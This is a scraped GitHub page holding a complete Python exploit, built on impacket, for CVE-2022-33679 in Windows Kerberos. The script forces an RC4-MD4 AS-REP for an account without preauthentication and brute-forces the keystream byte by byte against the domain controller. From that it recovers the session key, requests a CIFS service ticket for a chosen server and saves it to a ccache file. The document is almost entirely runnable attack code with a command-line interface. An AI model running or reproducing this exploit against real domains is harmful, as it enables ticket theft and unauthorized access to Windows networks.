-
Notifications
You must be signed in to change notification settings - Fork 71
/
CVE-2022-33679.py
361 lines (301 loc) · 14.8 KB
/
CVE-2022-33679.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
import datetime
import random
import argparse
import logging
import sys
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, \
PA_ENC_TS_ENC, AS_REP, EncryptedData, EncASRepPart, seq_set, \
seq_set_iter, KERB_ERROR_DATA, HostAddress, HostAddresses, Ticket
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REQ, TGS_REP, EncTGSRepPart
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.types import Ticket as TTicket
from impacket.krb5 import constants
from impacket.krb5.crypto import Key
from impacket.krb5.ccache import Principal as CPrincipal
from impacket.krb5.ccache import CCache, Header, Credential, Times, CountedOctetString
try:
from impacket.krb5.ccache import KeyBlockV4 as KeyBlock
except:
from impacket.krb5.ccache import KeyBlock
from arc4 import ARC4
try:
rand = random.SystemRandom()
except NotImplementedError:
rand = random
pass
class TGTBrute:
def __init__(self, target, domain, servername, options):
self.__user = target
self.__domain = domain
self.__servername = servername
self.__options = options
self.__kdcHost = options.dc_ip
self.__asReq = None
self.__reqBody = None
self.__encodedPacRequest = None
def prepareAsReq(self, requestPAC=True):
rsadsi_rc4_md4 = -128
self.__asReq = AS_REQ()
domain = self.__domain.upper()
serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
self.__encodedPacRequest = encoder.encode(pacRequest)
self.__asReq['pvno'] = 5
self.__asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
self.__reqBody = seq_set(self.__asReq, 'req-body')
opts = list()
opts.append( constants.KDCOptions.forwardable.value )
opts.append( constants.KDCOptions.renewable.value )
opts.append( constants.KDCOptions.proxiable.value )
self.__reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(self.__reqBody, 'sname', serverName.components_to_asn1)
seq_set(self.__reqBody, 'cname', userName.components_to_asn1)
if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
self.__reqBody['realm'] = domain
self.__reqBody['till'] = KerberosTime.to_asn1(now)
self.__reqBody['rtime'] = KerberosTime.to_asn1(now)
self.__reqBody['nonce'] = rand.getrandbits(31)
supportedCiphers = (rsadsi_rc4_md4,)
seq_set_iter(self.__reqBody, 'etype', supportedCiphers)
def getTGT(self, requestPAC=True):
self.prepareAsReq()
self.__asReq['padata'] = noValue
self.__asReq['padata'][0] = noValue
self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
self.__asReq['padata'][0]['padata-value'] = self.__encodedPacRequest
for i in range(20): # Add padding for more known bytes:
addr = HostAddress()
addr['addr-type']=1
addr['address']=bytes([0,0,0,i])
self.__reqBody['addresses'][i] = addr
message = encoder.encode(self.__asReq)
try:
r = sendReceive(message, domain, self.__kdcHost)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
logging.error(" RC4 is not supported")
exit()
else:
raise
return r
def sendEncTs(self, data, requestPAC=True):
self.prepareAsReq()
encryptedData = EncryptedData()
encryptedData['etype'] = -128
encryptedData['cipher'] = data
encodedEncryptedData = encoder.encode(encryptedData)
self.__asReq['padata'] = noValue
self.__asReq['padata'][0] = noValue
self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
self.__asReq['padata'][0]['padata-value'] = encodedEncryptedData
self.__asReq['padata'][1] = noValue
self.__asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
self.__asReq['padata'][1]['padata-value'] = self.__encodedPacRequest
message = encoder.encode(self.__asReq)
success = True
try:
r = sendReceive(message, domain, self.__kdcHost)
except Exception as e:
success = False
return success
def RecoverKey(self, encryptedAsREP):
AsREPPlain = b'\x00'*24+b'y\x82\x02\x140\x82\x02\x10\xa0\x1b0\x19\xa0\x03\x02\x01\x80\xa1\x12\x04\x10'
dec_len = len(encryptedAsREP) - 0x18
l1 = dec_len - 4
l2 = dec_len - 8
AsREPPlain = list(AsREPPlain)
AsREPPlain[26], AsREPPlain[27] = l1.to_bytes(2, 'big')
AsREPPlain[30], AsREPPlain[31] = l2.to_bytes(2, 'big')
RC4Flow = bytes([AsREPPlain[i]^encryptedAsREP[i] for i in range(45)])
#first byte of the key
now = datetime.datetime.utcnow()
Timestamp = (KerberosTime.to_asn1(now)).encode()
sTimestamp = len(Timestamp)+1
encodedTimeStamp = bytes([0 for i in range(24)])+bytes([0x30, sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(45)])
found = False
for i in range(256):
if self.sendEncTs(encryptedTimeStamp+bytes([i])):
RC4Flow += bytes([i])
logging.info("Byte 0: %02x"%i)
found = True
break
if found == False:
logging.error("No matching byte")
exit()
for j in range(4):
found = False
encodedTimeStamp = bytes([0 for i in range(24)])+bytes([0x30, 0x81+j])+bytes([0])*j
encodedTimeStamp += bytes([sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(46+j)])
for i in range(256):
if self.sendEncTs(encryptedTimeStamp+bytes([i])):
RC4Flow += bytes([i])
logging.info("Byte %d: %02x"%(j+1, i))
found = True
break
if found == False:
logging.error("No matching byte")
exit()
key = bytes([RC4Flow[i]^encryptedAsREP[i] for i in range(45, 50)]+[0xab]*11)
return key
def TGTtoTGS(self, TGT, sessionKey):
rsadsi_rc4_md4 = -128
serverName = Principal('cifs/%s'%self.__servername, type=constants.PrincipalNameType.NT_SRV_INST.value)
ticket = TTicket()
ticket.from_asn1(TGT['ticket'])
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
opts = list()
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq,'ticket', ticket.to_asn1)
authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = TGT['crealm'].asOctets()
clientName = Principal()
clientName.from_asn1( TGT, 'crealm', 'cname')
seq_set(authenticator, 'cname', clientName.components_to_asn1)
now = datetime.datetime.utcnow()
authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)
encodedAuthenticator = encoder.encode(authenticator)
cipher = ARC4(sessionKey[:8])
encryptedEncodedAuthenticator = cipher.encrypt(b'\x00'*24+encodedAuthenticator)
apReq['authenticator'] = noValue
apReq['authenticator']['etype'] = rsadsi_rc4_md4
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
encodedApReq = encoder.encode(apReq)
tgsReq = TGS_REQ()
tgsReq['pvno'] = 5
tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
tgsReq['padata'] = noValue
tgsReq['padata'][0] = noValue
tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
tgsReq['padata'][0]['padata-value'] = encodedApReq
reqBody = seq_set(tgsReq, 'req-body')
opts = list()
opts.append( constants.KDCOptions.forwardable.value )
opts.append( constants.KDCOptions.renewable.value )
opts.append( constants.KDCOptions.renewable_ok.value )
opts.append( constants.KDCOptions.canonicalize.value )
reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
reqBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = rand.getrandbits(31)
seq_set_iter(reqBody, 'etype',
(
int(constants.EncryptionTypes.rc4_hmac.value),
int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
int(constants.EncryptionTypes.des_cbc_md5.value),
)
)
message = encoder.encode(tgsReq)
r = sendReceive(message, self.__domain, self.__kdcHost)
return r
def TGSToCCache(self, TGS, sessionKey): #from CCache.fromTGT
ccache = CCache()
ccache.headers = []
header = Header()
header['tag'] = 1
header['taglen'] = 8
header['tagdata'] = b'\xff\xff\xff\xff\x00\x00\x00\x00'
ccache.headers.append(header)
tmpPrincipal = Principal()
tmpPrincipal.from_asn1(TGS, 'crealm', 'cname')
ccache.principal = CPrincipal()
ccache.principal.fromPrincipal(tmpPrincipal)
# Now let's add the credential
encryptedTGSREP = bytes(TGS['enc-part']['cipher'])
cipher = ARC4(sessionKey[:8])
plainText = cipher.decrypt(bytes(encryptedTGSREP))[24:]
encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
credential = Credential()
server = Principal()
server.from_asn1(encTGSRepPart, 'srealm', 'sname')
tmpServer = CPrincipal()
tmpServer.fromPrincipal(server)
credential['client'] = ccache.principal
credential['server'] = tmpServer
credential['is_skey'] = 0
credential['key'] = KeyBlock()
credential['key']['keytype'] = int(encTGSRepPart['key']['keytype'])
credential['key']['keyvalue'] = encTGSRepPart['key']['keyvalue'].asOctets()
credential['key']['keylen'] = len(credential['key']['keyvalue'])
credential['time'] = Times()
credential['time']['authtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['authtime']))
credential['time']['starttime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['starttime']))
credential['time']['endtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['endtime']))
# after kb4586793 for cve-2020-17049 this timestamp may be omitted
if encTGSRepPart['renew-till'].hasValue():
credential['time']['renew_till'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['renew-till']))
flags = ccache.reverseFlags(encTGSRepPart['flags'])
credential['tktflags'] = flags
credential['num_address'] = 0
credential.ticket = CountedOctetString()
credential.ticket['data'] = encoder.encode(TGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
credential.ticket['length'] = len(credential.ticket['data'])
credential.secondTicket = CountedOctetString()
credential.secondTicket['data'] = b''
credential.secondTicket['length'] = 0
ccache.credentials.append(credential)
return ccache
def run(self):
logging.info("Getting TGT - Retrieving AS-REP")
tgt = self.getTGT()
decodedtgt = decoder.decode(tgt, asn1Spec = AS_REP())[0]
encryptedAsREP = bytes(decodedtgt['enc-part']['cipher'])
logging.info("Trying to recover the RC4 Flow")
sessionKey = self.RecoverKey(encryptedAsREP)
logging.info("Recovered Session key: %s"%sessionKey.hex())
TGS = self.TGTtoTGS(decodedtgt, sessionKey)
logging.info("Got TGS for %s"%self.__servername)
decodedtgs = decoder.decode(TGS, asn1Spec = TGS_REP())[0]
ccache = self.TGSToCCache(decodedtgs, sessionKey)
logging.info("Saving ticket in %s" % (self.__user+'_'+self.__servername+'.ccache'))
ccache.saveFile(self.__user+'_'+self.__servername+'.ccache')
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "Retrieve a TGT for a user having"
"'Do not require Kerberos preauthentication' set and export their TGS of the given server")
parser.add_argument('target', action='store', help='domain/username')
parser.add_argument('serverName', action='store', help='server name')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
domain, username, password = parse_credentials(options.target)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
try:
executer = TGTBrute(username, domain, options.serverName, options)
executer.run()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))